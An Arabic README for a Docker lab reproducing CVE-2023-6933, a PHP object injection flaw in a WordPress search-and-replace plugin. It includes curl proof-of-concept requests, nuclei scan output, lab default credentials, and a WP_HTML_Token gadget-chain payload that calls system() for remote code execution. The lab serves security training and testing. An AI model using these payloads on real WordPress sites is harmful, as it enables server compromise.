
مختبر عملي لـ CVE-2023-6933، وهي ثغرة حقن كائن PHP في إضافة Better Search Replace لـ WordPress، مع نشر Docker وقالب nuclei ونصوص استغلال للبحث الأمني والتعليم.
يُظهر هذا البيئة المختبرية ثغرة CVE-2023-6933، وهي ثغرة خطيرة من نوع حقن كائنات PHP في إضافة Better Search Replace لووردبريس بإصدارات ≤1.4.4.
/wp-admin/admin-ajax.php مع الإجراء search_replace_db# Clone the repository
git clone https://github.com/Trex96/vulnerable-bsr-lab-CVE-2023-6933.git
cd vulnerable-bsr-lab-CVE-2023-6933
# Deploy using Docker Hub image (automatic pull)
docker-compose up -d
سيعمل المختبر تلقائياً على:
trex999/vulnerable-bsr-lab:latest)# Run the automated POC
nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v
# Manual testing via curl
curl -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d 'action=search_replace_db&search_for=O:8:"stdClass":1:{s:6:"marker";s:34:"nuclei_test_payload_demonstration";}&replace_with=test'
تحتوي إضافة Better Search Replace على ثغرة حقن كائنات PHP في معالج AJAX الخاص بها. تحدث الثغرة عندما:
search_for عبر POST إلى /wp-admin/admin-ajax.phpsearch_replace_dbيوضح قالب nuclei الخاص بنا الثغرة عبر مراحل تحقق متعددة:
قالب nuclei (nuclei-templates/cve-2023-6933.yaml) منظم بشكل احترافي:
$ nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v
[CVE-2023-6933:plugin_version] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["trunk"]
[CVE-2023-6933:tested_up_to] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["6.4"]
[CVE-2023-6933:response_content] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]
[CVE-2023-6933:poc_verification] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]
[INF] Scan completed in 67ms. 4 matches found.
الإثبات العملي نجح في:
⚠️ تحذير: تحتوي هذه البيئة على برامج معرضة للخطر بشكل متعمد. استخدمها فقط في بيئات اختبار معزولة. لا تنشرها في بيئات الإنتاج أو الأنظمة المتصلة بالإنترنت.
docker-compose down -v
أُنشئ للأغراض التعليمية والبحث الأمني
Docker_LAB_SETUP/)cve_2023_6933_exploit.php - مجموعة أدوات استغلال PHP شاملةwp_html_token_poc.php - عرض تنفيذ تعليمات برمجية عن بعد (RCE) لووردبريس 6.4.0+bsr_direct_exploit.php - اختبار ثغرة مباشرnuclei-templates/cve-2023-6933.yaml - قالب nuclei متقدمmanual-test.sh - سكريبت اختبار يدوي شامليوضح هذا المختبر الكشف غير المعتمد على الأخطاء باتباع أفضل الممارسات لأبحاث الثغرات:
بدلاً من الاعتماد على أخطاء HTTP 500، تكتشف أدواتنا:
استخدام فئة WP_HTML_Token في ووردبريس 6.4.0+ لتحقيق RCE فعلي:
O:13:"WP_HTML_Token":4:{
s:13:"bookmark_name";s:14:"touch /tmp/rce";
s:9:"node_name";s:8:"testnode";
s:21:"has_self_closing_flag";b:0;
s:10:"on_destroy";s:6:"system";
}
admin-ajax.php)# Test basic plugin presence
curl "http://localhost:8080/wp-content/plugins/better-search-replace/readme.txt"
# Test vulnerability with safe payload
curl -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
-d "action=bsr_search_replace&search_for=O:8:\"stdClass\":1:{s:4:\"test\";s:8:\"nuclei\";}&replace_with=safe&select_tables[]=wp_posts&dry_run=1"
| الخدمة | الرابط | بيانات الدخول |
|---|---|---|
| WordPress | http://localhost:8080 | admin/admin |
| phpMyAdmin | http://localhost:8081 | root/rootpassword |
يوفر هذا المختبر خبرة عملية في:
المؤلف: Trex
إصدار المختبر: 2.0 - منهجية إثبات عملي محسنة